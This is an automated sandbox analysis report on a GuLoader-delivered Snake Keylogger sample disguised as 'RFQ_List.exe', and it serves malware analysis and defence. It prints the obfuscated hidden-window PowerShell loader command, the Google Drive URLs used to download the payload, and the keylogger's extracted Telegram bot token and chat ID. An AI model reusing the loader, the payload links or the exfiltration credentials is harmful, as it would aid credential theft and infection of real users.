Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_List.exe

Overview

General Information

Sample name:RFQ_List.exe
Analysis ID:1543566
MD5:27393ac93e0c60c934afa5ccdfc7c529
SHA1:e1989ce514efd53819be62e8aa4c51975da0b3e0
SHA256:66f7ca7287b5118119d8e6b8d55222d7662da16c12345a6122a28b64702ae69b
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • RFQ_List.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\RFQ_List.exe" MD5: 27393AC93E0C60C934AFA5CCDFC7C529)
    • powershell.exe (PID: 6840 cmdline: "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5788 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • cmd.exe (PID: 3196 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • choice.exe (PID: 6996 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "7461961891:AAHpgycZJEK7D2I9irTI6QgjGM_Z4Ne7WIQ", "Chat_id": "-4555977660", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.2349116146.0000000009279000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 5788JoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security

        System Summary

        barindex
        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5788, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 51907
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6840, TargetFilename: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)", CommandLine: "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_List.exe", ParentImage: C:\Users\user\Desktop\RFQ_List.exe, ParentProcessId: 6588, ParentProcessName: RFQ_List.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)", ProcessId: 6840, ProcessName: powershell.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-28T06:47:23.845919+010028033053Unknown Traffic192.168.2.451960188.114.97.3443TCP
        2024-10-28T06:47:32.234588+010028033053Unknown Traffic192.168.2.452015188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-28T06:47:20.831783+010028032742Potentially Bad Traffic192.168.2.451943158.101.44.24280TCP
        2024-10-28T06:47:22.066174+010028032742Potentially Bad Traffic192.168.2.451943158.101.44.24280TCP
        2024-10-28T06:47:24.496127+010028032742Potentially Bad Traffic192.168.2.451966158.101.44.24280TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-28T06:47:14.901287+010028032702Potentially Bad Traffic192.168.2.451907142.250.185.206443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: RFQ_List.exeAvira: detected
        Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exeAvira: detection malicious, Label: HEUR/AGEN.1333748
        Source: 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7461961891:AAHpgycZJEK7D2I9irTI6QgjGM_Z4Ne7WIQ", "Chat_id": "-4555977660", "Version": "5.1"}
        Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exeReversingLabs: Detection: 66%
        Source: RFQ_List.exeReversingLabs: Detection: 66%
        Source: RFQ_List.exeVirustotal: Detection: 35%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

        Location Tracking

        barindex
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: RFQ_List.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51954 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:51907 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:51917 version: TLS 1.2
        Source: RFQ_List.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbt N source: powershell.exe, 00000001.00000002.2337305741.000000000764B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2347740691.0000000008742000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000001.00000002.2347740691.0000000008742000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2337305741.000000000764B000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\peritonealizing\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS query: name: checkip.dyndns.org
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:51966 -> 158.101.44.242:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:51943 -> 158.101.44.242:80
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:51960 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:51907 -> 142.250.185.206:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52015 -> 188.114.97.3:443
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51954 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
        Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
        Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002519E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
        Source: msiexec.exe, 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
        Source: RFQ_List.exe, RFQ_List.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251C2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
        Source: powershell.exe, 00000001.00000002.2332064457.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000001.00000002.2332064457.0000000004E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: msiexec.exe, 00000006.00000002.2667333235.00000000093B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: msiexec.exe, 00000006.00000002.2667333235.00000000093B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2677576018.00000000244D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc
        Source: msiexec.exe, 00000006.00000003.2514226077.000000000942F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2667333235.000000000942B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: msiexec.exe, 00000006.00000003.2514226077.000000000942F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2667333235.000000000942B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2667333235.0000000009418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download
        Source: powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
        Source: msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
        Source: msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
        Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 51954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51967
        Source: unknownNetwork traffic detected: HTTP traffic on port 51979 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51954
        Source: unknownNetwork traffic detected: HTTP traffic on port 52026 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51979
        Source: unknownNetwork traffic detected: HTTP traffic on port 52004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51995
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51960
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52004
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52015
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52026
        Source: unknownNetwork traffic detected: HTTP traffic on port 51917 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51967 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51995 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52015 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51917
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51907
        Source: unknownNetwork traffic detected: HTTP traffic on port 51907 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51960 -> 443
